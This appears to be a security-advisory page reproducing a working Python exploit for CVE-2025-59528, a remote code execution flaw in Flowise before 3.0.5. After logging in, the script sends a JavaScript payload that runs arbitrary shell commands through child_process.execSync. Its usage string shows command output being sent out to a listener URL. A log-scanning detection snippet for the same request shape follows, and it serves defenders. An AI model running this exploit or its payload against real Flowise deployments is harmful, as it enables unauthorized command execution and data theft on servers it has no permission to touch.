Flowise 3.0.4 Remote Code Execution
Flowise 3.0.4 contains a remote code execution (RCE) vulnerability that affects versions below 3.0.5. An attacker can execute arbitrary commands on the target system by sending a crafted request. The vulnerability has been publicly fixed and is assigned CVE-2025-59528.

2025-11-1 19:53:49 Author: cxsecurity.com


# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE)
# Date: 10/11/2025
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise
# Version: < 3.0.5
# CVE: CVE-2025-59528

from requests import post, session
from argparse import ArgumentParser

banner = r"""
 _____       _                              _____
/  __ \     | |                            /  ___|
| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--.
| |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
 \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
                            __/ |
                           |___/
                                        by nltt0
"""

try:
    parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --password Test@2025 --url http://localhost:3000 --cmd \"http://localhost:1337/`whoami`\"")
    parser.add_argument('-e', '--email', required=True, help='Registered email')
    parser.add_argument('-p', '--password', required=True)
    parser.add_argument('-u', '--url', required=True)
    parser.add_argument('-c', '--cmd', required=True)

    args = parser.parse_args()
    email = args.email
    password = args.password
    url = args.url
    cmd = args.cmd

    def login(email, url):
        session = session()
        url_format = "{}/api/v1/auth/login".format(url)
        headers = {"x-request-from": "internal",
                   "Accept-Language": "pt-BR,pt;q=0.9",
                   "Accept": "application/json, text/plain, */*",
                   "Content-Type": "application/json",
                   "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
                   "Origin": "http://workflow.flow.hc",
                   "Referer": "http://workflow.flow.hc/signin",
                   "Accept-Encoding": "gzip, deflate, br",
                   "Connection": "keep-alive"}
        data={"email": email, "password": password}
        r = session.post(url_format, headers=headers, json=data)
        return session, r

    def rce(email, url, password, cmd):
        session, status_code = login(email, url)
        url_format = "{}/api/v1/node-load-method/customMCP".format(url)
        command = f'({{x:(function(){{const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;}})()}})'
        data = {
            "loadMethod": "listActions",
            "inputs": {
                "mcpServerConfig": command
            }
        }
        r = session.post(url_format, json=data)

        if r.status_code == 401:
            session.headers["x-request-from"] = "internal"
            session.post(url_format, json=data)

        print(f"[x] Command executed [{cmd}]")

    rce(email, url, password, cmd)
except Exception as e:
    print('Error in {}'.format(e))
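For defenders, the request shape in the script above can be matched in logged traffic. The following is an added detection example, not part of the original advisory or the Flowise project: it flags POSTs to the customMCP load endpoint whose `mcpServerConfig` is not a strict JSON object. The record layout (`method`, `path`, `body`) and the sample records are assumptions about what a proxy or WAF log would capture.

```python
import json

# Path the script above posts to, compared lower-cased in case the
# server's routing is case-insensitive.
CUSTOM_MCP_PATH = "/api/v1/node-load-method/custommcp"


def classify_mcp_config(value):
    """Return 'ok' when mcpServerConfig is a strict JSON object, else a reason."""
    if isinstance(value, dict):
        return "ok"
    if not isinstance(value, str):
        return "unexpected-type"
    try:
        parsed = json.loads(value)
    except ValueError:
        # JavaScript expressions (parentheses, functions) land here, as does
        # relaxed JSON pasted by a legitimate user, so triage each hit.
        return "not-strict-json"
    return "ok" if isinstance(parsed, dict) else "not-an-object"


def flag_requests(records):
    """Return [(index, reason)] for customMCP load requests worth reviewing."""
    hits = []
    for i, rec in enumerate(records):
        path = rec.get("path", "").split("?")[0].rstrip("/").lower()
        if rec.get("method") != "POST" or path != CUSTOM_MCP_PATH:
            continue
        try:
            body = json.loads(rec.get("body") or "")
        except ValueError:
            hits.append((i, "unparseable-body"))
            continue
        inputs = body.get("inputs") if isinstance(body, dict) else None
        cfg = inputs.get("mcpServerConfig") if isinstance(inputs, dict) else None
        reason = classify_mcp_config(cfg) if cfg is not None else "ok"
        if reason != "ok":
            hits.append((i, reason))
    return hits


# Constructed sample records (not captured traffic). _SCRIPTY is a harmless
# expression with the same outer shape as the payload in the script above.
_BENIGN = '{"command": "npx", "args": ["-y", "example-mcp-server"]}'
_SCRIPTY = "({x:(function(){return 1;})()})"
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/api/v1/node-load-method/customMCP",
     "body": json.dumps({"loadMethod": "listActions", "inputs": {"mcpServerConfig": c}})}
    for c in (_BENIGN, _SCRIPTY)
] + [{"method": "GET", "path": "/api/v1/ping", "body": ""}]
```

Running `flag_requests(SAMPLE_RECORDS)` reports only the second record, with reason `not-strict-json`.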



 


Source: https://cxsecurity.com/issue/WLB-2025110001